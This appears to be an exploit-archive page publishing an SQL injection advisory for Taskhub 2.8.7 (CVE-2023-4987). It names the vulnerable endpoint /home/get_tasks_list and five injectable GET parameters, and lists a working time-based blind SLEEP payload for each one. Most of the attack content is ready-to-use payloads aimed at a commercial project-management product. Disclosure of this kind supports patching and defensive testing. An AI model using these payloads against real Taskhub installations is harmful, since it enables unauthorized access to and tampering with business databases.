Taskhub 2.8.7 SQL Injection

Taskhub 2.8.7 SQL Injection: Posted Sep 19, 2023; Authored by CraCkEr; Taskhub version 2.8.7 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; advisories | CVE-2023-4987; SHA-256 | ec51f7c0ec6ec9827399486aa736c27e2875675b7757f895f52b660f9301b1c9; Download | Favorite | View

Taskhub 2.8.7 SQL Injection

# Exploit Title: taskhub 2.8.7 - SQL Injection
# Exploit Author: CraCkEr
# Date: 05/09/2023
# Vendor: Infinitie Technologies
# Vendor Homepage: https://www.infinitietech.com/
# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
# Demo: https://taskhub.company/auth
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4987
# CWE: CWE-89 - CWE-74 - CWE-707


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.


Path: /home/get_tasks_list

GET parameter 'project' is vulnerable to SQL Injection
GET parameter 'status' is vulnerable to SQL Injection
GET parameter 'user_id' is vulnerable to SQL Injection
GET parameter 'sort' is vulnerable to SQL Injection
GET parameter 'search' is vulnerable to SQL Injection


https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]


---
Parameter: project (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: status (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: user_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: sort (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=

Parameter: search (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW
---


[-] Done

Top Authors In Last 30 Days

Red Hat 287 files
Ubuntu 60 files
Gentoo 32 files
Debian 28 files
Apple 9 files
malvuln 6 files
Jann Horn 5 files
Ahmet Umit Bayram 5 files
nu11secur1ty 5 files
Google Security Research 5 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,042)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,642)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,788)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,504)
UNIX (9,401)
UnixWare (187)
Windows (6,659)
Other

Taskhub 2.8.7 SQL Injection

Taskhub 2.8.7 SQL Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Taskhub 2.8.7 SQL Injection

Share This

Taskhub 2.8.7 SQL Injection

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems